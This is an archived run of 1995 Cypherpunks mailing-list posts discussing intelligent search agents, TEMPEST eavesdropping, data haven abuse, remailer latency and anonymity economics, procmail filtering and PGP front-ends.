Subject: intelligent discovery agents
Message-ID: <Pine.BSI.3.91.950107065739.8875A-100000@bonk.io.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995 Nesta Stubbs <nesta@nesta.pr.mcs.net> wrote:

>> There was some recent talk about network agent technology on this list.
>>
> does anynoe have any information about intelligent agents?  I mean I know 
> about filter and stuff, but they arent intelligent agents.  I assume one 
> would be something like the WWW worm and other searching scripts that 
> have a database of information to cross-reference their finds and decide 
> what to send back to you.  

You might want to check out Brian LaMacchia's Ph.D. proposal to create
a new class of knowbot, to be termed "Internet Fish".  It is posted on 
http://www.swiss.ai.mit.edu/~bal/bal-home.html

LaMacchia's proposal is interesting in that his 'fish' seem to have 
limited autonomy, thus moving us closer to a content-addressable model
of net info retrieval.

Also of interest is RFC 1728: Resource Transponders, by C. Weider.  The
idea is that there should be meta-information (information about 
information) available for use by info retrieval programs like 'archie'.  
From ftp://nic.ddn.mil/rfc/rfc1728.txt

The following is extracted from LaMacchia's abstract:

> We will design, implement and deploy a system for constructing
> ``Internet Fish,'' a new type of resource discovery tool.  Internet
> Fish attempt to discover new sources of information related to a
> particular topic; characteristics that describe the topic of interest
> may be specified by the user or deduced by the Fish over the course of
> time.  As part of the information-gathering process Fish conduct
> long-term conversations with users; these conversations permit Fish to
> ask for human assistance when necessary and allow humans to
> dynamically reallocate Fish resources.  In addition, Fish facilitate
> *serendipitous* resource discovery; that is, the act of finding
> interesting information in an unexpected place or manner, information
> that we were ``lucky'' to have discovered.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 05:17:09 PST
To: cypherpunks@toad.com
Subject: Dear Zimmy,
Message-ID: <Pine.3.89.9501070733.K14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



They still miss the point, I think.

They haven't figured out how to teach others.

They can do it in ten newsgroups.

They whine and snivel like two year old brats.

They just can't for the life of them grab the original letter.

They can't go teach their top-ten newsgroups.

They can't figure out how to come back here and rant how

they did it and I didn't (lose my account over it)

They rapidly forget crypto loses it's power against a bullet.

Eventually they'll come with guns again and take the machines away.

There were 10,000 newsgroups I only went to 10.

The best kill file is a turned off machine.

I touched my first fortran card 22 years ago.

There's a lot of difference between showing up the 12th,

and showing up in say 12 newsgroups.

Sorry Zimmy, It don't look good for the home team.

Love Always,

Carol Anne

Signature back on the drawing board 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 05:32:38 PST
To: cypherpunks@toad.com
Subject: A day in the life of the Cypherpunk list
Message-ID: <Pine.3.89.9501070747.L14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Bruce,

When you see the actual postings on the last 24 hours,
they are all running to the newsgroup to use killfiles.

Isn't it ostriches that do that kinda thing?

They've been caught napping.

The Webbittown Post Office could use all the remail people.
Every last one of them

And meanwhile, still stuck in the pine composer, lies the original response.

Good copy, definitely good copy.

Love Always,

Carol Anne

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 06:02:50 PST
To: x <cyber1@io.org>
Subject: Re: intelligent discovery agents
In-Reply-To: <Pine.BSI.3.91.950107065739.8875A-100000@bonk.io.org>
Message-ID: <Pine.3.89.9501070804.M14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


There's this rad.web.intelligent person by the name of Sang.
Visit Sang at http://www.inlink.com/users/sangria/homepage.html

Sang has more information on Robots, Spiders, Ants, and Worms
than any other computer person I have yet to link up with.
Feel free to grab a copy of the Web Server Software while your there.

Love Always,

Carol Anne
On Sat, 7 Jan 1995, x wrote:

> On Fri, 6 Jan 1995 Nesta Stubbs <nesta@nesta.pr.mcs.net> wrote:
> 
> >> There was some recent talk about network agent technology on this list.
> >>
> > does anynoe have any information about intelligent agents?  I mean I know 
Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Thomas" <jathomas@netcom.com>
Date: Sat, 7 Jan 95 08:44:51 PST
To: Derek Zeanah <Derek.Zeanah@f903.n102.z1.fidonet.org>
Subject: Re: TEMPEST Questions...
In-Reply-To: <121_9501062145@borderlin.quake.com>
Message-ID: <Pine.3.89.9501070814.A11177-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain




On 6 Jan 1995, Derek Zeanah wrote:

> 
> I'm writing an article on TEMPEST technology.
> 
> The focus is on what TEMPEST is and how to defeat it, if possible.  So far
> I've gotten some insightful information, but I'm looking for all I can get.
> 
> Has anyone ever heard of TEMPEST being used in the continental US?  Can anyone
> tell me what measures offer some level of protection, or steps that can be
> taken to reduce the likelihood of being successfully targeted?  Has anyone
> ever seen TEMPEST in action?
> 
You might start with van Eck, Wim, "Electromagnetic Radiation from Video 
Display Units:  An Eavesdropping Risk?", Computers & Security 4 (1985) 
269-286.  That will give you the technical basics.

If someone has actually seen Tempest interception in action, I'd like to 
hear about that as well.

John A. Thomas		jathomas@netcom.com
N5RZP			214/263-4351




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sat, 7 Jan 95 08:59:01 PST
To: jathomas@netcom.com (John A. Thomas)
Subject: Re: TEMPEST Questions...
In-Reply-To: <Pine.3.89.9501070814.A11177-0100000@netcom6>
Message-ID: <199501071544.JAA00423@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Hi all,

Regarding Tempest, 

Something similar happens to me in my workshop. I have several computers
stacked on two shelves. It is quite commen for several of them to be on
at one time. In particular when I have my Amiga 1200 driving my NEC TV/Monitor
I notice that it appears on the other composite video monitors even though
the Amiga drives RGB. What I think is happening is that the NEC is converting
the RGB to standard TV drive rates. The short of it is that I can watch my
Amiga 1200 on my TV that is sitting a couple approx 3ft. from it.

It could also be the fact that the 1200 has a video output that is poorly 
shielded. It is capable of driving a composite device directly as well.

One aspect that is interesting is that if you have several sources going 
at once the quality degrades. One possible technique for defeating such
monitoring would be to have a couple of standard video recorders drive a
video game rf modulator tied to an antenna to provide a 'shell' of drivel
from your cable feed. Your VCR may be able to drive the antenna directly.

Take care.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Sat, 7 Jan 95 09:38:57 PST
To: cypherpunks@toad.com
Subject: Re: Peter D. Lewis
In-Reply-To: <199501070558.AAA04212@bb.hks.net>
Message-ID: <Bbi3laa0iIK9076yn@ouray.denver.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 7 Jan 1995, "L. Todd Masco" <cactus@hks.net> wrote:

> Like "Seventeen," "Wired" should prepend "don't you wish you were" to
> its title.

Ah, yes, I wish I were "(c) Both of the above" -- as the Sinatra lyric
sez, "When I was seventeen, it was a very WiReD year..."

I think generalizing about "Wired" is like generalizing about the NY
Times, where Markoff and Lewis arguably exemplify the best and worst
of mainstream computer/telecom journalism.  "Wired" has many flaws, but
I consider Steven Levy's articles about Cypherpunks, Whitfield Diffie,
and digital cash to be among the best expositions of Cypherpunk issues
for the layperson.  (Kelly's "Whole Earth Review" piece is another.)

I can forgive some faults in return for seeing Levy's non-technical
explanations of public-key crypto and the Dining Cryptographers protocol
in successive issues. :-)

Alan Westrope                  <awestrop@nyx.cs.du.edu>
__________/|-,                 <adwestro@ouray.denver.colorado.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw7QeVRRFMq4NZY5AQEc8AQAqZ/Yp7+yEEYikZja/bF8c468I4C147q7
7AjuMsT1NN0Yt9HZB+mxtKdrbOL7QLyJgbk3c6NJ18nUkianZTnQNCEzr35BYwh7
7dCsIsiMWUVdjmahjEeppJZvKAZrRioW0KAMTnmPK6vWFXtttS0kl5k5FG/na3+n
KJoDdNOVsTg=
=lcQW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sat, 7 Jan 95 09:21:03 PST
To: dfloyd@io.com
Subject: Re: Data Haven problems
In-Reply-To: <199501071710.LAA21334@pentagon.io.com>
Message-ID: <199501071606.KAA00541@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> 
> While programming my data haven code, I am wondering how to guard against
> spamming the data haven parser.  It is trivial to mount a denial of
> service attack by repeatedly mailing large files. which will fill up the 
> quota or filesystem of the data haven host, and if you have mail on a 
> root partition, will cause hangs or crashes.
>
If there is no cost associated with the haven and there are no account
limitations (ie anyone can get an account) then I don't see a means to do
it reliably. However, if you work up a fee based scheme such that you 
charge per M then it is trivial. If the data is larger than the account
balance it bounces. By limiting the availability of accounts you can make
it less enticeing for users to spam the haven because they are hurting
themselves. And it is assumed that since the accounts are limited  that 
there is an assumed web of trust working.

> Any ideas on how to guard against mailbombs, and to confirm to the sender
> that their files are stored successfully?  Perhaps do a mailing with
> a test command that validates the existance of the file, and sends a
> reply back wether the file is okay or not, or would this result in a
> possible security hole?
>
It seems to me that a message should come back only if there is a problem.
 
> As to the code, this will have to be my second rewrite as I am going to
> do it in perl code, rather than C...  last rewrite was from a daemon to
> a program activated by a .forward file.
> 
> Lastly, instead of postage (like a remailer would get), how hard would it
> be to implement "rent" where if the "rent" is not paid, and a grace period
> has elapsed the file would be trashed.  All this while preserving the
> anonymity of the sender and the data haven site.
>
This form of dating files is pretty commen in bbs systems where if a user
doesn't log in for say 30 days the account and its contents are deleted.
To do this doesn't even require knowing anything about the user  other than
how long the files have been there versus how long they are supposed to be
there.

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 7 Jan 95 10:47:56 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: A Fire Upon the Deep
In-Reply-To: <199501071808.NAA09510@bwh.harvard.edu>
Message-ID: <Pine.SUN.3.91.950107103037.10733D-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Adam Shostack wrote:
> 	Anonymous mail has bandwidth costs that are only slightly
> higher than regular mail.  You could hide quite a bit in most video
> packets.  The latency is a reflection of the lack of volume, because
> volume is needed for reordering.  If your favorite remailer gets more
> mail, the latency will drop.

Anonymous e-mail that goes through a chain of N remailers will cost at
least N times as much bandwidth and have N times as much latency as normal
e-mail.  But e-mail is hardly the state-of-the-art of network
communication, while anonymous e-mail IS the state of the art for
anonymous communication.  How long will it take for the technology of
anonymous video conferencing to develope, for example?  By then, of
course, those who are not concerned with anonymity will probably have
things such as full sensory virtual interaction. 

Note that I SUPPORT anonymous communication, but its costs of bandwidth 
and latency may be a real obsticle to developing Cryptoanarchy (of the 
kind described by Tim May) if most people are not willing to put up with 
those costs.

Wei Dai
PGP encrypted mail welcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 7 Jan 95 07:58:53 PST
To: cypherpunks@toad.com
Subject: NYT on Survivalists
Message-ID: <199501071559.KAA23283@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Philip Weiss writes in tomorrow's Magazine a very long (52K) 
cover story on Idaho survivalists Bo Gritz, Randy Weaver and 
the burgeoning anti-government population.  The longest story 
I've seen in there in years.

Mentions societal threats of cashless economy, tax nix, and 
more c'punk tonics.

Is The Times getting antsy, seeding a L&O crackdown?  Or 
huffing luridities?

See for yerself by sending blank message with subject:  SUR_huf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dfloyd@io.com
Date: Sat, 7 Jan 95 09:09:48 PST
To: cypherpunks@toad.com
Subject: Data Haven problems
Message-ID: <199501071710.LAA21334@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


While programming my data haven code, I am wondering how to guard against
spamming the data haven parser.  It is trivial to mount a denial of
service attack by repeatedly mailing large files. which will fill up the 
quota or filesystem of the data haven host, and if you have mail on a 
root partition, will cause hangs or crashes.

Any ideas on how to guard against mailbombs, and to confirm to the sender
that their files are stored successfully?  Perhaps do a mailing with
a test command that validates the existance of the file, and sends a
reply back wether the file is okay or not, or would this result in a
possible security hole?

As to the code, this will have to be my second rewrite as I am going to
do it in perl code, rather than C...  last rewrite was from a daemon to
a program activated by a .forward file.

Lastly, instead of postage (like a remailer would get), how hard would it
be to implement "rent" where if the "rent" is not paid, and a grace period
has elapsed the file would be trashed.  All this while preserving the
anonymity of the sender and the data haven site.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLw7KpFLUeLjqSiixAQHs4wf+Mf4CVx77nXjUXug/3q1hINhCyWgWmal7
vY1WeCDXM+qrrdxUgqzIhYRYpCPKChMjeozFltn9T0CcH/YdaD5hx3dB5A0YUPWZ
SpF5oCL3iZzf2veA8BBJEIrFdmts/nFUzWaqMx4+2IcufYb+0kVw/AKi2M5B0ZiT
UoOFFIsySR9hIMMIfHlkGqrnoO8LhlViRBx4u1O0bb0GYAyc+Nv6HvDJOSWuVe9C
g5B4GMLuW1t9e5Qw3W0Qy1VRIC4QbOrd0zbjDrQ38GUemOjALuZ2h4+tr3bR93KU
ZthueqsIzGKlr90PU6AVVZd128mDHLofJO4I4IoOgSPV7XIK4tufyA==
=KZk0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peb@netcom.com (Paul E. Baclace)
Date: Sat, 7 Jan 95 11:19:20 PST
To: root@einstein.ssz.com
Subject: Re: TEMPEST Questions...
Message-ID: <199501071919.LAA22533@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Grady Ward wrote an article on implementing something like TEMPEST
("something like" means that it was not derived from classified
documents).  I can't seem to find my copy of his text and it doesn't 
appear anymore at netcom:/ftp/pub/gr/grady...Anyyone have a pointer
to this?

This article is definitely the most practical and comprehensive that
I've seen on this subject.

Paul E. Baclace
peb@netcom.com
peb@eng.sun.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 11:50:42 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Latency Costs of Anonymity
In-Reply-To: <Pine.SUN.3.91.950107103037.10733D-100000@eskimo.com>
Message-ID: <199501071950.LAA22106@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[thread name changed to reflect actual topic]

Wei Dai wrote:

> Note that I SUPPORT anonymous communication, but its costs of bandwidth 
> and latency may be a real obsticle to developing Cryptoanarchy (of the 
> kind described by Tim May) if most people are not willing to put up with 
> those costs.
> 

The good news is that many of the messages that people want
anonymity for are *text* files, e.g., offers of services,
controversial data or opinions, etc. 

There's a kind of tradeoff in size and urgency. To wit, it is seldom
"urgent" that a 1 MB or 100 MB or whatever file get through. (Sorry I
can't draw my favorite little diagram here showing the space of
messages, with "urgency" and "size" as the axes.)

However, I will try such a diagram here:

    ^      ^         
    |      |short                    <---there are very few large files
 URGENCY   |messages                     that must be urgently transmitted
           |
           |
           |
           |                  non-urgent
           |                  huge files
           ---------------------->
             text     books    videos
             10K       1 MB     1GB
                   S I Z E --->

(The tradeoffs are of viewing time, caching, information, etc. A short
message can be _read_ quickly, and hence may need to be transmitted
quickly. The canonical "Attack at dawn" message, for example. A long
message, such as my 1.3 MB FAQ, clearly can be delayed for hours or
days with no real loss, save impatience. My contention is that network
speeds--ISDN, Mosaic usage, faster modems, direct connections--are
being set up and that "urgent-but-small" messages will fit in nicely,
and with low latency through remailers. In the next several years,
that is.)


What this means is that networks of the future, set up to handle huge
files, video-on-demand, etc., will allow text messages to be carried
almost unnoticeably. Interstitially, if you will.

Reordering still requires N messages (whatever N may be), so it is
true that remailer sites must still have some traffic. But this
doesn't have to introduce latencies that are unacceptable.

(If this isn't clear, what I mean by the situation about large files
being shipped is that there should be little cost for users
circulating their own dummy messages through remailer chains. Digital
postage will cost, but costs will drop. Lots of tradeoffs here. No
point in me or any of us trying to anticipate costs, volumes, etc., as
these will evolve and the market will decide.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 7 Jan 95 12:51:25 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Latency Costs of Anonymity
In-Reply-To: <199501071950.LAA22106@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.950107123504.23218B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Timothy C. May wrote:

> The good news is that many of the messages that people want
> anonymity for are *text* files, e.g., offers of services,
> controversial data or opinions, etc. 
> 
> There's a kind of tradeoff in size and urgency. To wit, it is seldom
> "urgent" that a 1 MB or 100 MB or whatever file get through. (Sorry I
> can't draw my favorite little diagram here showing the space of
> messages, with "urgency" and "size" as the axes.)

The points Tim makes here are quite good.  However, I'm more concerned 
with a slightly longer time scale, when people focus less on FILES, 
but more on CONVERSATIONS and INTERACTIONS.  It is then that latency 
becomes more problematic.

Can anyone give me an estimate of when truly anonymous video conferencing 
will become possible?  This is not just to help me make the point, but 
I'm really wondering.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sat, 7 Jan 95 10:08:06 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Re: A Fire Upon the Deep
In-Reply-To: <Pine.SUN.3.91.950106190639.16522B-100000@eskimo.com>
Message-ID: <199501071808.NAA09510@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Anonymous mail has bandwidth costs that are only slightly
higher than regular mail.  You could hide quite a bit in most video
packets.  The latency is a reflection of the lack of volume, because
volume is needed for reordering.  If your favorite remailer gets more
mail, the latency will drop.

	Also, on the book trend, Neal Stephenson's new book, The
Diamond Age (Bantam Spectra, 1995) has a brilliant hacker dump
information he comes across becuase its encrypted, and he knows he'll
never manage to break the encryption scheme.  I haven't finished it,
but its quite good about 1/3 of the way through.

Adam


Wei Dai wrote:

| One more thing that's marginally related to cypherpunks (hey I really
| like this book so I'll take any chance I can to talk about it ;-) is
| the idea that the efficiency of distributed computation (and distributed 
| intelligence) depends on high bandwidth and low latency of the communication
| medium.  Since anonymity seems to have rather high costs in terms of
| bandwidth and latency (compare anonymous e-mail with internet video
| conferencing or even with normal e-mail), this implies that
| an organization of anonymous agents will not work as efficiently as
| a similar orginzation whose members are not concerned about
| anonymity.


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sat, 7 Jan 95 10:19:54 PST
To: nesta@nesta.pr.mcs.net (Nesta Stubbs)
Subject: Re: procmail
In-Reply-To: <Pine.3.89.9501062210.A7984-0100000@nesta.pr.mcs.net>
Message-ID: <199501071818.NAA09659@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


ftp.informatik.rwth-aachen.de:/pub/packages/procmail

I find I need the following rule to get everything sent to
cypherpunks:


:0
* (^TOCypherpunks|Sender:.*cypherpunks|^From owner-cypherpunks@toad.com)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doumakes@netcom.com (Don Doumakes)
Date: Sat, 7 Jan 95 11:27:20 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Let's NOT talk about Netcom
Message-ID: <199501071927.LAA09582@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If I wanted to read flamage about Netcom, I'd check out netcom.general,
which is 150 messages a day of, mostly, garbage.  I earnestly request
that we not duplicate that clutter on the cpunks list.

- --
______________________________________________________________________
Don Doumakes             Finger doumakes@netcom.com for PGP public key

Foxpro databases built to your specifications.  Email me for details.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLw6RQxtumcu2AjihAQHKTwP/fMxLVjDp/9yO2hFkCJQ+Vo5PGQvEAakt
KiCrs3nTsbZwkwxjyzgwgnuJkOVcIWgIndkO+AViI4zmOTT+9lp2FlK3gdv1qIWl
+pI/rkcegd9jyzRxz+HybONLtppAft8RZ6UlPmzS2w2Il+oHIPK9OtxRH5bGXj2D
YHzBctPXYt0=
=msXo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 7 Jan 95 11:54:26 PST
To: cypherpunks@toad.com
Subject: Re: cel fraud
In-Reply-To: <9501071759.AA00953@anon.penet.fi>
Message-ID: <950107.134210.3m7.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, an172607@anon.penet.fi writes:

> AT&T's Steve Fleischer, speaking to Newsbytes, said such cloning operations
> have become such a successful criminal industry that some criminals sell the
> phones with 30-day guarantees.
> 
> "If a number is cut off, you can bring it back to the cellular bandits and
> have it reprogrammed for no additional charge," he explained. "It costs the
> carriers around $1 million a day."
> 
> He paused, then added: "It just shows how big a demand there is for wireless
> communications."

Does anyone else think this is funny (in both senses of the word)?

The cell-phraud system shows a demand for cheap, though illegal, phone
service.  The wireless aspect is pretty much incidental to the fraud
aspect, no?
- -- 
       Roy M. Silvernail         [ ]  roy@cybrspc.mn.org
                    PGP public key available by mail
     echo /get /pub/pubkey.asc | mail file-request@cybrspc.mn.org
         These are, of course, my opinions (and my machines)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw7vEhvikii9febJAQGLlgQAiteZ/51syb6gSkiwWMLs9oQ+99hMxbps
L7rshpeQ0xDM7GN+Szz4PiQ4CQrqMlxxkvgppsrRbU2E5WPv8IGvW9pa6gWx8Y9B
H/ZwmjSz1lIMCATh5osFt9myK3nkwHasxjGYqpyJJwcbTd+rQi8/lIv1EYcxv+HX
qtiHdjrFvbE=
=D0AH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 14:58:36 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Re: Latency Costs of Anonymity
In-Reply-To: <Pine.SUN.3.91.950107123504.23218B-100000@eskimo.com>
Message-ID: <199501072258.OAA28744@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:

> The points Tim makes here are quite good.  However, I'm more concerned 
> with a slightly longer time scale, when people focus less on FILES, 
> but more on CONVERSATIONS and INTERACTIONS.  It is then that latency 
> becomes more problematic.
> 
> Can anyone give me an estimate of when truly anonymous video conferencing 
> will become possible?  This is not just to help me make the point, but 
> I'm really wondering.

I didn't know you meant real-time conversations and interactions.
These are indeed very hard to get acceptable latency on in mixes.

Defeating traffic analysis in such a case is highly problematic, at
least with conventional remailers. (Unconventional remailers, such as
a dedicated telephone "traffic scrambler," with lots of internal
bandwith between nodes, could work. Obviously a lot of other traffic
would have to be flowing in and out.)

The tradeoffs are best analyzed with an actual mathematical model of
nodes, traffic rates, clumping of traffic, etc., rather than our
hand-waving here (hand-waving is OK for broad conceptual points, but
not in cases like this).

I'll be interested in what others calculate, but I think "conversation
mixes" are several years off, at best. The upcoming demo of Voice PGP
by Phil Zimmermann (scheduled to appear at the Demo Day meeting next
Saturday) may be a step in this direction.

BTW, to my graph in my last post we could add a z-axis representing
"value." Roughly, how much per unit of data transmitted. The
crypto-canonical "Attack at dawn" message might easily be worth many
dollars per byte to transmit untraceably, whereas a casual phone
conversation between Alice and Bob may not be worth (to them,
separately or in combination) much more than a few cents per kilobyte
transmitted.

In other words, there are economic as well as technologic reasons I
doubt we'll see low-latency, high-bandwidth audio or video remailers
anytime soon. (As we're seeing now: short messages can get through in
tens of seconds, 

But like I said, some calculations are called for. I'd start by
analyzing the existing voice-over-Internet systems, the packet sizes,
and so forth.

My suspicion is that Alice and Bob cannot defeat traffic analysis
while ~10K bits per second are flowing continuously between them
(audio), at least not until _many_ subnetworks are _much_
faster. Also, the CPU loads would be great (= costly)). Video is even
further off. Tricks to reduce bandwidth may help.

The digital mixes implicitly assumed in "True Names"--the year before
Chaum published his seminal mix paper--are a ways off.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 7 Jan 95 14:59:27 PST
To: cypherpunks@toad.com
Subject: Re: Latency Costs of Anonymity
Message-ID: <199501072300.PAA25794@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Wei Dai <weidai@eskimo.com>
> The points Tim makes here are quite good.  However, I'm more concerned 
> with a slightly longer time scale, when people focus less on FILES, 
> but more on CONVERSATIONS and INTERACTIONS.  It is then that latency 
> becomes more problematic.

I think this is a good point.  We have had some discussions about getting
anonymity with web browsing.  The "mix" or "remailer" concept doesn't
work so well there as the connections are very short, so there is less
chance of multiple communications going on at one time.

OTOH I have heard discussions of asynchronous transfer mode, ATM, as a
new packet-based network technology that could support high bandwidth
communications.  All messages, presumably even streams like video
signals, get broken into fixed-size packets, which make their way through
the network and are reassembled into a stream on the other end.  The
individual packets may not all take the same path through the network.
(I am far from an expert on ATM so I welcome corrections to this
description.)

This technology does sound like mixing could work pretty well to provide
anonymity.  There is some price in bandwidth and latency but ATM is so
fast that probably several steps of chaining and mixing would be
possible.  Naturally such mixes would have to be hardware based due to the
rapid speeds of the packets.  So this would be kind of a "souped up"
version of our current email remailer network, with vastly greater
bandwidths and switching speeds.

Another possibility with connection-based communications would be
Chaum's DC-Nets.  These are networks where message source cannot be
determined.  They do face potentially severe costs in terms of
bandwidth, though, depending on how much anonymity you get.  As both
mixes and dcnets have bandwidth costs, I wonder if it is provable that
anonymity implies such costs.

> Can anyone give me an estimate of when truly anonymous video conferencing 
> will become possible?  This is not just to help me make the point, but 
> I'm really wondering.
> 
> Wei Dai

I think it may be more useful rather than speaking of "true" anonymity
to think of factor-of-N anonymity.  This reflects the bandwidth costs.  I
would guess that, if you have a packet-based video converencing system,
that today you could probably get factor-of-2 anonymity with custom
hardware, and perhaps even more than that.

One other point I would make, based on Wei's original post, is that no
doubt anonymity does exact some costs.  However this does not mean that
it is uncompetitive.  It also may have, in some circumstances,
advantages.  People may be more frank and critical when they are shielded
by anonymity.  I've read articles about companies which introduce
electornic "suggestion boxes" where people can post anonymously, and
upper management is often shocked at the results.  It is too early to
judge how much of a net benefit or harm anonymity will be in general.

Furthermore, it is likely that the net advantage will differ depending on
the business or organization.  At one extreme, a group working with
illegal or restricted technology would probably benefit more from
anonymity.  I think it was Keith Henson who posted a story here a couple
of years ago that he was working on, involving some kind of underground
protest group which organized itself using crypto anonymity.  So it is
really not a question of whether anonymity is good or bad, but rather
whether its costs outweigh its advantages in a particular situation.

Hal Finney
hfinney@shell.portal.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLw8c9xnMLJtOy9MBAQFZBgH/R1c3FLHECJiEHDoUl/gUPaBIVzd3kvVz
Uv2jqFwJxSFQjnrb1wtGT7vLjNOOXJ7uYpBNJU+ZfPSKOvPgGFD8yQ==
=+6iw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Sat, 7 Jan 95 12:18:49 PST
To: Oren Tanay <RopeGun@calvino.alaska.net>
Subject: Re: pgp shells for windows....
In-Reply-To: <Chameleon.950107020459.RopeGun@RopeGun.alaska.net>
Message-ID: <Pine.SOL.3.91.950107151525.1686A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 7 Jan 1995, Oren Tanay wrote:

[PGP Windoze front-end request. . .]

In response to a similar question a wiser head than mine suggested 
looking in ftp to 

unix.hensa.ac.uk/pub/uunet/pub/security/virus/crypt/pgp/shells



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
